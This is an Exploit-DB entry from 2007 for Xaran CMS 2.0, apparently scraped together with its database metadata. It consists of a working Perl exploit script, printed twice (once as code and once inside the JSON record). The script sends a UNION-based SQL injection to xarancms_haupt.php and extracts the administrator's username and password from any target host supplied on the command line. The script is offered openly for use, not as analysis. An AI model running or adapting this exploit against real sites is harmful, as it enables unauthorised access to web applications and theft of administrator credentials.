ID EDB-ID:3298
Type exploitdb
Reporter ajann
Modified 2007-02-13T00:00:00
Description
Xaran Cms <= 2.0 (xarancms_haupt.php) SQL Injection Exploit. Webapps exploit for php platform
#!/usr/bin/perl
#[Script Name: Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.xarancms.de
#[$$ : 149.00 EUR
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/xarancms_haupt.php?id=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
$target = "-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),konfiguration_benutzername,char(32,112,97,115,115,119,111,114,100,58),konfiguration_benutzerkennwort)%20from%20xarancms_konfiguration";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /letzte Aktualisierung: username:(.*?) pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /password:(.*?)<\/div>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2007-02-13]
{"id": "EDB-ID:3298", "hash": "eb9d9ec84d1ff207e2cdc2dd0507eeb6", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Xaran CMS <= 2.0 xarancms_haupt.php SQL Injection Exploit", "description": "Xaran Cms <= 2.0 (xarancms_haupt.php) SQL Injection Exploit. Webapps exploit for php platform", "published": "2007-02-13T00:00:00", "modified": "2007-02-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/3298/", "reporter": "ajann", "references": [], "cvelist": [], "lastseen": "2016-01-31T18:09:32", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-01-31T18:09:32"}, "dependencies": {"references": [], "modified": "2016-01-31T18:09:32"}, "vulnersScore": 0.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3298/", "sourceData": "#!/usr/bin/perl\n#[Script Name: Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit\n#[Coded by : ajann\n#[Author : ajann\n#[Contact : :(\n#[S.Page : http://www.xarancms.de\n#[$$ : 149.00 EUR\n#[.. : ajann,Turkey\n\nuse IO::Socket;\nif(@ARGV < 1){\nprint \"\n[========================================================================\n[// \tXaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit\n[// Usage: exploit.pl [target]\n[// Example: exploit.pl victim.com\n[// Example: exploit.pl victim.com\n[// Vuln&Exp : ajann\n[========================================================================\n\";\nexit();\n}\n#Local variables\n$server = $ARGV[0];\n$server =~ s/(http:\\/\\/)//eg;\n$host = \"http://\".$server;\n$port = \"80\";\n$file = \"/xarancms_haupt.php?id=\";\n\nprint \"Script <DIR> : \";\n$dir = <STDIN>;\nchop ($dir);\n\nif ($dir =~ /exit/){\nprint \"-- Exploit Failed[You Are Exited] \\n\";\nexit();\n}\n\nif ($dir =~ /\\//){}\nelse {\nprint \"-- Exploit Failed[No DIR] \\n\";\nexit();\n }\n\n\n$target = \"-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),konfiguration_benutzername,char(32,112,97,115,115,119,111,114,100,58),konfiguration_benutzerkennwort)%20from%20xarancms_konfiguration\";\n$target = $host.$dir.$file.$target;\n\n#Writing data to socket\nprint \"+**********************************************************************+\\n\";\nprint \"+ Trying to connect: $server\\n\";\n$socket = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"$port\") || die \"\\n+ Connection failed...\\n\";\nprint $socket \"GET $target HTTP/1.1\\n\";\nprint $socket \"Host: $server\\n\";\nprint $socket \"Accept: */*\\n\";\nprint $socket \"Connection: close\\n\\n\";\nprint \"+ Connected!...\\n\";\n#Getting\nwhile($answer = <$socket>) {\nif ($answer =~ /letzte Aktualisierung: username:(.*?) pass/){\nprint \"+ Exploit succeed! Getting admin information.\\n\";\nprint \"+ ---------------- +\\n\";\nprint \"+ Username: $1\\n\";\n}\n\nif ($answer =~ /password:(.*?)<\\/div>/){\nprint \"+ Password: $1\\n\";\n}\n\nif ($answer =~ /Syntax error/) { \nprint \"+ Exploit Failed : ( \\n\";\nprint \"+**********************************************************************+\\n\";\nexit(); \n}\n\nif ($answer =~ /Internal Server Error/) {\nprint \"+ Exploit Failed : ( \\n\";\nprint \"+**********************************************************************+\\n\";\nexit(); \n}\n }\n\n# milw0rm.com [2007-02-13]\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}